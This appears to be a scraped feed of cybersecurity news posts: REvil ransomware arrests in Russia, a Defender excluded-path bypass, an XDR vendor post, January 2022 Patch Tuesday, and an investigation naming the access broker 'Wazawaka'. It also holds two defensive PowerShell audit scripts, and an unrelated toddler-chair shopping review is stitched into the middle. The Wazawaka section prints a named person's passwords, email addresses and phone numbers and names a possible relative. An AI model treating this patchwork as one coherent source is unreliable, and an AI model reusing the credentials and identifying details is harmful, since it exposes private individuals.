At Request of U.S., Russia Rounds Up 14 REvil Ransomware Affiliates

The Russian government said today it arrested 14 people accused of working for “REvil,” a particularly aggressive ransomware group that has extorted hundreds of millions of dollars from victim organizations. The Russian Federal Security Service (FSB) said the actions were taken in response to a request from U.S. officials, but many experts believe the crackdown is part of an effort to reduce tensions over Russian President Vladimir Putin’s decision to station 100,000 troops along the nation’s border with Ukraine.

The FSB headquarters at Lubyanka Square, Moscow. Image: Wikipedia.

The FSB said it arrested 14 REvil ransomware members, and searched more than two dozen addresses in Moscow, St. Petersburg, Leningrad and Lipetsk. As part of the raids, the FSB seized more than US $600,000, 426 million rubles (roughly US $5.5 million), 500,000 euros, and 20 “premium cars” purchased with funds obtained from cybercrime.

“The search activities were based on the appeal of the US authorities, who reported on the leader of the criminal community and his involvement in encroaching on the information resources of foreign high-tech companies by introducing malicious software, encrypting information and extorting money for its decryption,” the FSB said. “Representatives of the US competent authorities have been informed about the results of the operation.”

The FSB did not release the names of any of the individuals arrested, although a report from the Russian news agency TASS mentions two defendants: Roman Gennadyevich Muromsky, and Andrey Sergeevich Bessonov. Russian media outlet RIA Novosti released video footage from some of the raids.

REvil is widely thought to be a reincarnation of GandCrab, a Russian-language ransomware affiliate program that bragged of stealing more than $2 billion when it closed up shop in the summer of 2019. For roughly the next two years, REvil’s “Happy Blog” would churn out press releases naming and shaming dozens of new victims each week. A February 2021 analysis from researchers at IBM found the REvil gang earned more than $120 million in 2020 alone.

But all that changed last summer, when REvil associates working with another ransomware group — DarkSide — attacked Colonial Pipeline, causing fuel shortages and price spikes across the United States. Just months later, a multi-country law enforcement operation allowed investigators to hack into the REvil gang’s operations and force the group offline.

In November 2021, Europol announced it had arrested seven REvil affiliates who collectively made more than $230 million worth of ransom demands since 2019. At the same time, U.S. authorities unsealed two indictments against a pair of accused REvil cybercriminals, which referred to the men as “REvil Affiliate #22” and “REvil Affiliate #23.”

It is clear that U.S. authorities have known for some time the real names of REvil’s top captains and moneymakers. Last fall, President Biden told Putin that he expects Russia to act when the United States shares information on specific Russians involved in ransomware activity.

So why now? Russia has amassed approximately 100,000 troops along its southern border with Ukraine, and diplomatic efforts to defuse the situation have reportedly broken down. The Washington Post and other media outlets today report that the Biden administration has accused Moscow of sending saboteurs into Eastern Ukraine to stage an incident that could give Putin a pretext for ordering an invasion.

“The most interesting thing about these arrests is the timing,” said Kevin Breen, director of threat research at Immersive Labs. “For years, Russian Government policy on cybercriminals has been less than proactive to say the least. With Russia and the US currently at the diplomatic table, these arrests are likely part of a far wider, multi-layered, political negotiation.”

President Biden has warned that Russia can expect severe sanctions should it choose to invade Ukraine. But Putin in turn has said such sanctions could cause a complete break in diplomatic relations between the two countries.

Dmitri Alperovitch, co-founder of and former chief technology officer for the security firm CrowdStrike, called the REvil arrests in Russia “ransomware diplomacy.”

“This is Russian ransomware diplomacy,” Alperovitch said on Twitter. “It is a signal to the United States — if you don’t enact severe sanctions against us for invasion of Ukraine, we will continue to cooperate with you on ransomware investigations.”

The REvil arrests were announced as many government websites in Ukraine were defaced by hackers with an ominous message warning Ukrainians that their personal data was being uploaded to the Internet. “Be afraid and expect the worst,” the message warned.

Experts say there is good reason for Ukraine to be afraid. Ukraine has long been used as the testing grounds for Russian offensive hacking capabilities. State-backed Russian hackers have been blamed for the Dec. 23, 2015 cyberattack on Ukraine’s power grid that left 230,000 customers shivering in the dark.

The warning left behind on Ukrainian government websites that were defaced in the last 24 hours. The same statement is written in Ukrainian, Russian and Polish.

Russia also has been suspected of releasing NotPetya, a large-scale cyberattack initially aimed at Ukrainian businesses that ended up creating an extremely disruptive and expensive global malware outbreak.

Although there has been no clear attribution of these latest attacks to Russia, there is reason to suspect Russia’s hand, said David Salvo, deputy director of The Alliance for Securing Democracy.

“These are tried and true Russian tactics. Russia used cyber operations and information operations in the run-up to its invasion of Georgia in 2008. It has long waged massive cyberattacks against Ukrainian infrastructure, as well as information operations targeting Ukrainian soldiers and Ukrainian citizens. And it is completely unsurprising that it would use these tactics now when it is clear Moscow is looking for any pretext to invade Ukraine again and cast blame on the West in its typical cynical fashion.”

The Good, the Bad and the Ugly in Cybersecurity – Week 2

The Good

Cyber cops in Ukraine, assisted by US and UK law enforcement officers, have this week busted a ransomware gang that is believed to have caused losses of around $1 million to more than 50 American and European businesses.

According to the Cyberpolice of Ukraine, a husband-and-wife team from Kyiv aided by three accomplices used malspam to breach companies and infect them with ransomware. The gang also offered IP anonymization services to other cyber criminals and stole banking credentials from UK consumers. These were subsequently used to purchase goods from online stores, which were later resold for cash.

The gang no doubt believed they were on to a good thing until the cops raided their homes and confiscated three cars along with multiple computers, phones, bank cards and flash drives. The five individuals will be charged with offenses related to computer misuse, the use, distribution or sale of malicious software or hardware, and money laundering. As the gang had contacts with other international cyber criminals, there is the potential for further arrests down the road, and police say the investigation is ongoing.

The Bad

While it’s great to see the police take down one ransomware gang, plenty of others are still running amok. This week has seen a number of other successful attacks impacting businesses.

Among those affected is the Netherlands’ Game Mania, which was hit in the early hours of Monday morning with a ransomware attack and data breach. Attackers gained access to a server containing company data, including customer PII, and deployed an unnamed ransomware. While the company says its business activities remain unaffected, it is warning customers to be vigilant of phishing scams and unsolicited emails demanding money.

Wednesday saw another attack on US critical infrastructure. Last week it was an Albuquerque jail, this week it’s the education sector. Albuquerque Public Schools were forced to cancel classes in around 31 schools after teachers discovered the attack prevented them from accessing the APS student information system, which is used to record attendance, grades and other student information.

In a stark reminder of the true costs of ransomware, this week also saw Houston-based United Structures of America, Inc., which fabricates and designs steel structures for use in buildings and other applications, file for bankruptcy as a consequence of a ransomware attack back in 2019. The attackers erased the company’s financial records and technical software and demanded a ransom for return of the data. Although the company paid the ransom, the attackers did not fulfill their end of the bargain and the data was never returned. As a result, the company, which at one time had brought in revenue in excess of $100 million, was forced to start winding down its operations.

The Ugly

Software development and bugs go hand-in-hand, which is why many vendors offer bug bounty programs so that external researchers can help spot problems the developers may not have foreseen. Even so, some really bad bugs remain unpatched, and things really start to turn ugly when it turns out that a piece of security software has had a known but unpatched bypass for eight years.

The bug? It turns out Microsoft Defender allows unprivileged users to look up any locally excluded paths. Even if an admin hasn’t created any exclusions, certain software installations and server configurations can result in some paths being automatically excluded. If an attacker has local access, they can look up these excluded paths and drop their malware at paths that Defender will ignore. Researchers this week tested the theory with a sample of Conti ransomware, encrypting the device while Defender sat idly by.

For enterprises relying on Defender to protect their servers and other endpoints, this is a gaping security hole. While an attacker does need a foothold, they don’t need privileges, and with plenty of other RCEs available at the moment, it really is past time that enterprises started looking beyond OS vendors for effective defense of their endpoints and networks.
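An added example, not part of the newsletter above: a PowerShell audit, run from an elevated prompt with the built-in Get-MpPreference cmdlet, that lists a host’s configured Defender exclusions and flags the ones most worth reviewing given the issue just described, namely paths an unprivileged user can write to, whole-drive or wildcard paths, and extension or process exclusions. The set of user-writable prefixes is an assumption to adapt to your environment.

```powershell
# Added example (not from the article): audit Microsoft Defender exclusions as an
# administrator and flag the ones an attacker with only local user access could
# abuse by dropping files into an excluded location. Requires the Defender
# PowerShell module (Get-MpPreference); run elevated.

function Get-RiskyDefenderExclusions {
    [CmdletBinding()]
    param()

    $pref = Get-MpPreference

    # Locations a standard user can normally write into. Assumption: these are
    # the prefixes worth reviewing first; extend the list for your environment.
    $userWritable = @(
        "$env:SystemDrive\Users\",
        "$env:ProgramData\",
        "$env:SystemRoot\Temp\",
        "$env:SystemRoot\Tasks\"
    )

    $findings = @()

    foreach ($p in @($pref.ExclusionPath)) {
        if (-not $p) { continue }
        $reason = $null
        if ($p -match '^[A-Za-z]:\\?$') {
            # "C:" or "C:\" turns off scanning for a whole volume
            $reason = 'Excludes an entire drive'
        }
        elseif ($p -match '[\*\?]') {
            $reason = 'Wildcard exclusion; review what it actually matches'
        }
        else {
            foreach ($prefix in $userWritable) {
                if ($p.StartsWith($prefix, [System.StringComparison]::OrdinalIgnoreCase)) {
                    $reason = "Under user-writable location $prefix"
                    break
                }
            }
        }
        if ($reason) {
            $findings += [pscustomobject]@{ Type = 'Path'; Value = $p; Reason = $reason }
        }
    }

    # Extension exclusions apply everywhere on disk, so they are always worth a look.
    foreach ($e in @($pref.ExclusionExtension)) {
        if ($e) {
            $findings += [pscustomobject]@{ Type = 'Extension'; Value = $e; Reason = 'Applies to every path on the host' }
        }
    }

    # Process exclusions skip scanning of files opened by that process.
    foreach ($proc in @($pref.ExclusionProcess)) {
        if ($proc) {
            $findings += [pscustomobject]@{ Type = 'Process'; Value = $proc; Reason = 'Files opened by this process are not scanned' }
        }
    }

    return $findings
}

Get-RiskyDefenderExclusions | Format-Table -AutoSize
```

Run it across a fleet through your management tooling and compare the output against the exclusions you intended to configure; anything unexpected, including vendor-added paths, should be justified or removed.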

Toddler wooden chair – cute and worth your trust!

There is nothing better than a classic, trusty wooden chair when you need a place for your child to sit. Made of natural materials, able to bear significant weight, and easy to clean with a damp cloth – you can’t go wrong with this.

As a parent, the biggest problem that you may come across is finding a reliable toddler wooden chair. It is quite likely that you will find various ones on the market, but it may be confusing to choose which one would suit your kid’s needs.

You don’t need to worry, as we have compiled all the necessary information about toddler wooden chairs and their pros and cons here. First, let us start with what to consider when buying a wooden chair for your toddler.

Things To Consider Before Buying A Wooden Toddler Chair

You may find many stylish and durable toddler wooden chairs, but it’s crucial to keep certain things in your mind before buying one.

• Your kid’s comfort. Make sure that the seat is deep enough to accommodate your toddler. The bottom of the chair must be sturdy to bear heavy pressure on it.

• Durability. The wooden toddler chair should be sturdy and long-lasting so that your child can use it for many years without any problem. A strong base is advisable because the child’s weight will be on the chair, so avoid chairs made up of plastic or metal as they are not durable. The wooden one is best as it can be used for many years.

• Material. Wooden toddler chairs are much more durable and comfortable, which is why most parents prefer buying a wooden one rather than other types. There are various kinds of wood available on the market, but go for ones with veneer as it is more durable and long-lasting.

• Price. You may find many wooden toddler chairs within your budget, so do not worry about the price.

These are some tips that you need to consider before buying a wooden toddler chair for your child. It not only lets you share time with your kid but also develops various skills in them like creativity and independence.

Best wooden chairs for your toddler

Do you want to buy a wooden toddler chair for your child? Here are some of the best ones available in the market.

Famobay Bunny Ears Wooden Toddler Chair

Just look how cute this toddler chair is! The backrest shaped like bunny ears is an adorable feature for little ones. It is made of solid and smooth wooden construction, making it long-lasting and sturdy.

Based on its innovative design, you would think that this toddler chair would be much more expensive than any other option on the market. However, it is not the case here!

This bunny ears toddler chair is available on Amazon at a very reasonable price. It is solid, durable, and easy to keep clean, making it the best choice for your household.

Famobay Antlers Wooden Toddler Chair

If you like Bunny Ears Toddler Wooden Chair, you will be happy to learn that another similar toddler chair is available. This time its design is based on antlers to make your little one feel like a wild animal.

Like the previous product, this antlers toddler chair is made of natural smooth wood, making it very durable. It can carry weight of up to 400 lbs, which you can’t say about other products on the market. There is no doubt that your child can use this chair for many years.

Melissa & Doug Wooden Chairs, Set of 2

Melissa & Doug’s kids’ furniture is the way to go for those wanting a simple and classic design for a kids’ room. The playroom chairs set was created with safety in mind – something Melissa & Doug is well-known for. The chairs feature a reinforced, tip-resistant design.

They are made from durable wood, with materials that hold up to 100 pounds. The Melissa & Doug Solid Wood Chairs set makes an excellent gift for kids from 3 to 8 years old.

Toddler Chair CXRYLZ

If you like a simple design but still wish to bring your toddler a little bit of color, take a look at this chair. This little chair is made of wood and will surely look lovely in any kids’ room. It also has round edges, which are much safer for your toddler than sharp ones.

This chair is so cute, you might not want to give it away when your kid grows up! Beautiful colors are not the only thing that makes this chair so unique. It is also made of quality materials which make it durable and long-lasting.

Its compact size will help you fit it almost anywhere in your house, even if you have limited space for kids’ furniture: 25cm/10in legs, 30 x 30cm/12” x 12” seat surface, and 26.5 x 20cm/10.5” x 7.9” backrest. This cutie can hold up to 250 lbs.

HOUCHICS Wooden Toddler Chair

Unique toddler wooden chair! This piece has a curved back to better protect your child from being injured by the prismatic edge of the wooden stool. It is not only for safety reasons but also to give your child a more comfortable sitting position.

This toddler chair has an additional feature of non-slip pads that will help prevent the stool from sliding on the floor surface. You can also adjust its height depending on what you need at the moment.

The HOUCHICS Wooden Toddler Chair is very easy to clean – you can use a damp cloth and soap. A wide handle at the back provides a comfortable grip to lift the toddler chair off the floor.

It’s suitable for children from 3 years of age up to 6-7 years. Be sure that your child will be comfortable sitting on this stool!

iPlay iLearn 10 Inch Kids Solid Hard Wood Animal Chair

Cute animal chairs with vivid, engaging characters are appealing and attractive to children aged 2 and up. Not only will your child be excited to sit on the iPlay iLearn animal chairs, but they will be learning at the same time.

Each chair has a sturdy 10-inch solid wood base designed to prevent tipping when your child leans against it. The triangular structure of the chair legs helps prevent tipping, and anti-slip pads on each leg prevent falls.

The iPlay iLearn chairs can be stacked for easy storage, and they are made of 100% natural smooth hardwood. They are hand-painted with non-toxic paints to ensure complete safety.

This is the perfect gift for toddlers aged 2-4! Parents love it because it is sturdy, safe, and easy to clean; kids love them because of the vibrant colors and animal characters. Among the patterns, you’ll find a giraffe visible above, a frog, and a cow.

Why is it necessary to buy a wooden toddler chair?

As we all know, kids look forward to spending time with their parents and if you can encourage them to spend more time on furniture, then do it as soon as possible. As a parent, you must have noticed that your child prefers being beside you rather than playing alone. It’s a sign that your child wants to spend more time with you, which is absolutely normal.

The best way to encourage them is to buy them a wooden toddler chair because it would allow your child to sit beside you and enjoy being together while reading books or watching exhibits on display cabinets. This can be good practice for your child to be more responsible and understand the concept of time, as it also encourages them to play independently.

Children prefer wooden chairs because they are much more comfortable than other types. They like splashes of color in their surroundings, so if you buy a wooden toddler chair in a vibrant color, your child will love it. A wooden toddler chair is the best way to encourage your child and develop their creative side.

Apart from all these benefits, toddlers learn many things by watching us, so if you want them to become responsible and obedient in the future, teach them how to sit correctly on a wooden toddler chair. They will get an idea about sitting straight, and it would be beneficial for them in the future.

The post Toddler wooden chair – cute and worth your trust! appeared first on Comfy Bummy.

Rapid Response with XDR One-Click Remediations

Responding to a cyber threat takes time, because defenders want to do more than merely stop malicious threats: they also need to ensure that any compromised identities or accounts are restored, that any lingering phishing emails sitting in inboxes ready to re-detonate and restart the attack are cleaned up, that if vulnerable software was involved it’s patched or removed from endpoints, and the list goes on.

For years now, the only way to do this efficiently was via a SOAR, and that required high costs and usually additional headcount to build and maintain the playbooks. All this led to a very ‘human-centric’ manual response process, which added up to a longer containment and response time.

XDR was made to solve problems like these. Singularity XDR unifies and extends detection, investigation and response capability across the entire enterprise, providing security teams with centralized end-to-end enterprise visibility, powerful analytics, and automatable response across the technology stack – making every security workflow faster, more effective and more accurate.

Recently, we introduced XDR apps for response that take this approach to the next level with one-click remediations. Let’s find out more.

XDR Response Actions for One-Click Remediation

Our recent launch of additional XDR apps for response is an XDR milestone that will continue to strengthen Singularity XDR. With XDR Response actions, a user can drop an API Key into our Marketplace, choose the automatic actions and conditions they desire, and SentinelOne will do the rest.

This kind of response can take an action in seconds that would have otherwise taken minutes or required opening a ticket and waiting.

Take the act of resetting a user’s password and expiring their sessions. Most SOC analysts don’t have access to the proper Identity Provider (IdP) portals to do this, as the identity team doesn’t want to add the entire SOC to the portal. At best, it would have required the identity team creating very specific RBAC roles in AD, Okta, etc., to have security roles. Without access, the analyst must open a ticket and wait. With XDR, there’s a button for that. Where is it? Right in the threat.

XDR Response actions are the single click that can stop expansion. If an analyst finds a threat where an internal user’s credentials have been used to log into email and send phishing links, XDR can suspend the user’s email access or just block the hash from being passed around. Until the credentials can be trusted again, that analyst can also move the user to a more restrictive SASE policy to ensure data like financial results and intellectual property stored in cloud apps are protected.

How Does It Work?

The identity team provides the SentinelOne admin an API key which is then input into the Marketplace. The key can be broadly permissive or purpose fit to ensure least privilege just for the SentinelOne XDR use cases.

Next, the user selects which integrations to turn on and which to leave disabled. They then select if the action should happen on all threats or just those SentinelOne has higher confidence on as being malicious. The user is now done with configuration.

The app they selected is pre-programmed with all the logic needed. The next time a matching threat pops up, SentinelOne will automatically take the chosen action.

For admins that want to allow analysts to evaluate threats before taking actions, manual actions can be enabled in the same Marketplace flow. Manual actions allow admins to browse a list of all enabled XDR actions to remediate a threat across the stack, whether it be banning a hash, a user, or an IP address.

This keeps the analyst in the loop before actions are taken while still helping accelerate remediation to minutes instead of hours or even days when there are dependencies on another team.

XDR Offers Greater Flexibility Than a SOAR

While a SOAR can be a tremendous tool for those who have the budget and staff, XDR is the turnkey tool that allows more teams to adopt orchestration. SOAR playbooks can run highly customized flows but maintaining them as processes and tools change has proved a barrier or unsustainable for many.

Enabling a list of automatic actions or manually selecting them from a threat triage model is the flexible approach that enables every team of every size to be more efficient and effective.

What Triggered This Innovation, Why Now?

This technological leap is arriving now because of the need to streamline security workflows, consolidate various tools in the SOC while rapidly responding to remediate threats across the enterprise. While partnerships and Marketplaces have been done before, they’ve never been done with this level of deeper, frictionless integration.

XDR requires vendors to work together to build integrations that go deeper and broader. We’ve found the market is ready to partner and that’s why we’ve taken a “native and open” approach to XDR, offering many solutions on our platform while partnering with best-in-class vendors from across the stack.

XDR is the result of a better understanding of how teams work and what fits budgets. Security is trending in the direction of tools that give teams flexibility without requiring them to build and maintain complex logic or code.

The market has been waiting for simple security that saves teams time and money without a large upfront investment. Technology, partnership, and knowledge have all converged to bring security into the next generation.

Conclusion

With XDR apps for response and one-click remediations, Singularity XDR and Singularity Marketplace continue to expand, offering deeper, more effective integrations that simplify the remediation cycle.

Automated actions are available today and will become more nuanced in how and when they are automatically invoked as our partners create new APIs for us to integrate with, to go deeper into their products, and unlock the full value of every layer in the stack to mitigate and remediate threats.

Interested in learning more? Read about our open approach to XDR that allows for connecting best-in-class products. Want to see how XDR works for your organization? Contact us or request a free Singularity XDR demo.


‘Wormable’ Flaw Leads January 2022 Patch Tuesday

Microsoft today released updates to plug nearly 120 security holes in Windows and supported software. Six of the vulnerabilities were publicly detailed already, potentially giving attackers a head start in figuring out how to exploit them in unpatched systems. More concerning, Microsoft warns that one of the flaws fixed this month is “wormable,” meaning no human interaction would be required for an attack to spread from one vulnerable Windows box to another.

Nine of the vulnerabilities fixed in this month’s Patch Tuesday received Microsoft’s “critical” rating, meaning malware or miscreants can exploit them to gain remote access to vulnerable Windows systems through no help from the user.

By all accounts, the most severe flaw addressed today is CVE-2022-21907, a critical, remote code execution flaw in the “HTTP Protocol Stack.” Microsoft says the flaw affects Windows 10 and Windows 11, as well as Server 2019 and Server 2022.

“While this is definitely more server-centric, remember that Windows clients can also run http.sys, so all affected versions are affected by this bug,” said Dustin Childs from Trend Micro’s Zero Day Initiative. “Test and deploy this patch quickly.”

Quickly indeed. In May 2021, Microsoft patched a similarly critical and wormable vulnerability in the HTTP Protocol Stack; less than a week later, computer code made to exploit the flaw was posted online.
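An added example, not part of the article: a single-host exposure check for CVE-2022-21907 in PowerShell, run elevated. It reports whether the kernel HTTP listener (http.sys) is running, whether the vulnerable trailer-parsing path is active, and whether the January 2022 cumulative update is installed. Assumptions: the EnableTrailerSupport registry value is the switch Microsoft’s advisory names for Windows 10 1809 / Server 2019 (build 17763), where the vulnerable path is off by default; the KB-to-build mapping covers only the two KBs mentioned later in the article (KB5009557 for Server 2019 / build 17763, KB5009555 for Server 2022 / build 20348), and other editions are reported as unknown.

```powershell
# Added example (not from the article): local triage for CVE-2022-21907.
# Run from an elevated PowerShell prompt on the host being checked.

function Test-Cve202221907Exposure {
    [CmdletBinding()]
    param()

    $os    = Get-CimInstance -ClassName Win32_OperatingSystem
    $build = [int]$os.BuildNumber

    # http.sys is a kernel driver, so query Win32_SystemDriver rather than Get-Service.
    $httpDrv     = Get-CimInstance -ClassName Win32_SystemDriver -Filter "Name='HTTP'"
    $httpRunning = ($null -ne $httpDrv) -and ($httpDrv.State -eq 'Running')

    # Assumption (from Microsoft's advisory for this CVE): on build 17763
    # (Windows 10 1809 / Server 2019) the vulnerable trailer support is only
    # reachable when this DWORD is set to 1. Other affected builds have it on
    # by default, so for them the path is treated as active.
    $paramKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\HTTP\Parameters'
    $trailer  = (Get-ItemProperty -Path $paramKey -Name EnableTrailerSupport -ErrorAction SilentlyContinue).EnableTrailerSupport
    $vulnPathActive = ($build -ne 17763) -or ($trailer -eq 1)

    # Cumulative updates named in the article; only these two builds are mapped.
    $kbByBuild = @{ 17763 = 'KB5009557'; 20348 = 'KB5009555' }
    $kb = $kbByBuild[$build]
    $patched = if ($kb) { $null -ne (Get-HotFix -Id $kb -ErrorAction SilentlyContinue) } else { $null }

    # Exposed = listener up, vulnerable path active, and no evidence of the patch
    # (PatchInstalled is $null when the build is not in the mapping, which also
    # counts as "no evidence", so review those hosts by hand).
    [pscustomobject]@{
        Caption        = $os.Caption
        Build          = $build
        HttpSysRunning = $httpRunning
        VulnPathActive = $vulnPathActive
        ExpectedKB     = if ($kb) { $kb } else { 'unknown for this build' }
        PatchInstalled = $patched
        Exposed        = $httpRunning -and $vulnPathActive -and ($patched -ne $true)
    }
}

Test-Cve202221907Exposure | Format-List
```

A superseding later cumulative update also contains the fix, so on hosts patched after January 2022 treat a missing January KB as a prompt to check the installed build revision rather than as proof of exposure.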

Microsoft also fixed three more remote code execution flaws in Exchange Server, a technology that hundreds of thousands of organizations worldwide use to manage their email. Exchange flaws are a major target of malicious hackers. Almost a year ago, hundreds of thousands of Exchange servers worldwide were compromised by malware after attackers started mass-exploiting four zero-day flaws in Exchange.

Microsoft says the limiting factor with these three newly found Exchange flaws is that an attacker would need to be tied to the target’s network somehow to exploit them. But Satnam Narang at Tenable notes Microsoft has labeled all three Exchange flaws as “exploitation more likely.”

“One of the flaws, CVE-2022-21846, was disclosed to Microsoft by the National Security Agency,” Narang said. “Despite the rating, Microsoft notes the attack vector is adjacent, meaning exploitation will require more legwork for an attacker, unlike the ProxyLogon and ProxyShell vulnerabilities which were remotely exploitable.”

Security firm Rapid7 points out that roughly a quarter of the security updates this month address vulnerabilities in Microsoft’s Edge browser via Chromium.

“None of these have yet been seen exploited in the wild, though six were publicly disclosed prior to today,” Rapid7’s Greg Wiseman said. “This includes two Remote Code Execution vulnerabilities affecting open source libraries that are bundled with more recent versions of Windows: CVE-2021-22947, which affects the curl library, and CVE-2021-36976 which affects libarchive.”

Wiseman said slightly less scary than the HTTP Protocol Stack vulnerability is CVE-2022-21840, which affects all supported versions of Office, as well as SharePoint Server.

“Exploitation would require social engineering to entice a victim to open an attachment or visit a malicious website,” he said. “Thankfully the Windows preview pane is not a vector for this attack.”

Other patches include fixes for .NET Framework, Microsoft Dynamics, Windows Hyper-V, Windows Defender, and the Windows Remote Desktop Protocol (RDP). As usual, the SANS Internet Storm Center has a per-patch breakdown by severity and impact.

Standard disclaimer: Before you update Windows, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a decent chance other readers have experienced the same and may chime in here with useful tips.

Update, Jan. 12, 9:02 a.m.: Apparently some of the updates Microsoft released yesterday — KB5009557 (2019) and KB5009555 (2022) — are causing something to fail on domain controllers, which then keep rebooting every few minutes. That’s according to this growing thread on Reddit (hat tip to @campuscodi).

Who is the Network Access Broker ‘Wazawaka?’

In a great many ransomware attacks, the criminals who pillage the victim’s network are not the same crooks who gained the initial access to the victim organization. More commonly, the infected PC or stolen VPN credentials the gang used to break in were purchased from a cybercriminal middleman known as an initial access broker. This post examines some of the clues left behind by “Wazawaka,” the hacker handle chosen by a major access broker in the Russian-speaking cybercrime scene.

Wazawaka has been a highly active member of multiple cybercrime forums over the past decade, but his favorite is the Russian-language community Exploit. Wazawaka spent his early days on Exploit and other forums selling distributed denial-of-service (DDoS) attacks that could knock websites offline for about USD $80 a day. But in more recent years, Wazawaka has focused on peddling access to organizations and to databases stolen from hacked companies.

“Come, rob, and get dough!” reads a thread started by Wazawaka on Exploit in March 2020, in which he sold access to a Chinese company with more than $10 billion in annual revenues. “Show them who is boss.”

According to his posts on Exploit, Wazawaka has worked with at least two different ransomware affiliate programs, including LockBit. Wazawaka said LockBit had paid him roughly $500,000 in commissions for the six months leading up to September 2020.

Wazawaka also said he’d teamed up with DarkSide, the ransomware affiliate group responsible for the six-day outage at Colonial Pipeline last year that caused nationwide fuel shortages and price spikes. The U.S. Department of State has since offered a $5 million reward for information leading to the arrest and conviction of any DarkSide affiliates.

Wazawaka seems to have adopted the uniquely communitarian view that when organizations being held for ransom decline to cooperate or pay up, any data stolen from the victim should be published on the Russian cybercrime forums for all to plunder — not privately sold to the highest bidder. In thread after thread on the crime forum XSS, Wazawaka’s alias “Uhodiransomwar” can be seen posting download links to databases from companies that have refused to negotiate after five days.

“The only and the main principle of ransomware is: the information that you steal should never be sold,” Uhodiransomwar wrote in August 2020. “The community needs to receive it absolutely free of charge if the ransom isn’t paid by the side that this information is stolen from.”

Wazawaka hasn’t always been so friendly to other cybercrooks. Over the past ten years, his contact information has been used to register numerous phishing domains intended to siphon credentials from people trying to transact on various dark web marketplaces. In 2018, Wazawaka registered a slew of domains spoofing the real domain for the Hydra dark web market. In 2014, Wazawaka confided to another crime forum member via private message that he made good money stealing accounts from drug dealers on these marketplaces.

“I used to steal their QIWI accounts with up to $500k in them,” Wazawaka recalled. “A dealer would never go to the cops and tell them he was selling stuff online and someone stole his money.”

WHO IS WAZAWAKA?

Wazawaka used multiple email addresses and nicknames on several Russian crime forums, but data collected by cybersecurity firm Constella Intelligence show that Wazawaka’s alter egos always used one of three fairly unique passwords: 2k3x8x57, 2k3X8X57, and 00virtual.

Those three passwords were used by one or all of Wazawaka’s email addresses on the crime forums over the years, including wazawaka@yandex.ru, mixseo@mail.ru, mixseo@yandex.ru, mixfb@yandex.ru.

That last email address was used almost a decade ago to register a Vkontakte (Russian version of Facebook) account under the name Mikhail “Mix” Matveev. The phone number tied to that Vkontakte account — 7617467845 — was assigned by the Russian telephony provider MegaFon to a resident in Khakassia, situated in the southwestern part of Eastern Siberia.

DomainTools.com [an advertiser on this site] reports mixfb@yandex.ru was used to register three domains between 2008 and 2010: ddosis.ru, best-stalker.com, and cs-arena.org. That last domain was originally registered in 2009 to a Mikhail P. Matveyev, in Abakan, Khakassia.

Mikhail Matveev is not the most unusual name in Russia, but other clues help narrow things down quite a bit. For example, early in his postings to Exploit, Wazawaka can be seen telling members that he can be contacted via the ICQ instant message account 902228.

An Internet search for Wazawaka’s ICQ number brings up a 2009 account for a Wazawaka on a now defunct discussion forum about Kopyovo-a, a town of roughly 4,400 souls in the Russian republic of Khakassia:

MIKHAIL’S MIX

Also around 2009, someone using the nickname Wazawaka and the 902228 ICQ address started posting to Russian social media networks trying to convince locals to frequent the website “fureha.ru,” which was billed as another website catering to residents of Khakassia.

According to the Russian domain watcher 1stat.ru, fureha.ru was registered in January 2009 to the email address mix@devilart.net and the phone number +79617467845, which is the same number tied to the Mikhail “Mix” Matveev Vkontakte account.

DomainTools.com says the mix@devilart.net address was used to register two domains: one called badamania[.]ru, and a defunct porn site called tvporka[.]ru. The phone number tied to that porn site registration back in 2010 was 79235810401, also issued by MegaFon in Khakassia.

A search in Skype for that number shows that it was associated more than a decade ago with the username “matveevatanya1.” It was registered to a now 29-year-old Tatayana Matveeva Deryabina, whose Vkontakte profile says she currently resides in Krasnoyarsk, the largest city that is closest to Abakan and Abaza.

It seems likely that Tatayana is a relative of Mikhail Matveev, perhaps even his sister. Neither responded to requests for comment. In 2009, a Mikhail Matveev from Abaza, Khakassia registered the username Wazawaka on weblancer.net, a freelance job exchange for Russian IT professionals. The Weblancer account says Wazawaka is currently 33 years old.

In March 2019, Wazawaka explained a lengthy absence on Exploit by saying he’d fathered a child. “I will answer everyone in a week or two,” the crime actor wrote. “Became a dad — went on vacation for a couple of weeks.”

One of the many email addresses Wazawaka used was devdelphi@yandex.ru, which is tied to a more recent but since-deleted Vkontakte account for a Mikhail Matveev and used the password 2k3X8X57. As per usual, I put together a mind map showing the connections referenced in this story:

A rough mind map of the connections mentioned in this story.

Analysts with cyber intelligence firm Flashpoint say Wazawaka’s postings on various Russian crime forums show he is proficient in many specializations, including botnet operations, keylogger malware, spam botnets, credential harvesting, Google Analytics manipulation, selling databases for spam operations, and launching DDoS attacks.

Flashpoint says it is likely Wazawaka/Mix/M1x has shared cybercriminal identities and accounts with multiple other forum members, most of whom appear to have been partners in his DDoS-for-hire business a decade ago. For example, Flashpoint points to an Antichat forum thread from 2009 where members said M1x worked on his DDoS service with a hacker by the nickname “Vedd,” who was reputedly also a resident of Abakan.

STAY TRUE, & MOTHER RUSSIA WILL HELP YOU

All of this is academic, of course, provided Mr. Wazawaka chooses to a) never leave Russia and b) avoid cybercrime activities that target Russian citizens. In a January 2021 thread on Exploit regarding the arrest of an affiliate for the NetWalker ransomware program and its subsequent demise, Wazawaka seems already resigned to those limitations.

“Don’t shit where you live, travel local, and don’t go abroad,” Wazawaka said of his own personal mantra.

Which might explain why Wazawaka is so lackadaisical about hiding and protecting his cybercriminal identities: incredibly, Wazawaka’s alter ego on the forum XSS — Uhodiransomwar — still uses the same password on the forum that he used for his Vkontakte account 10 years ago. Lucky for him, XSS also demands a one-time code from his mobile authentication app.

The second step of logging into Wazawaka’s account on XSS (Uhodiransomwar).

Wazawaka said NetWalker’s closure was the result of its administrator (a.k.a. “Bugatti”) getting greedy, and then he proceeds to preach about the need to periodically re-brand one’s cybercriminal identity.

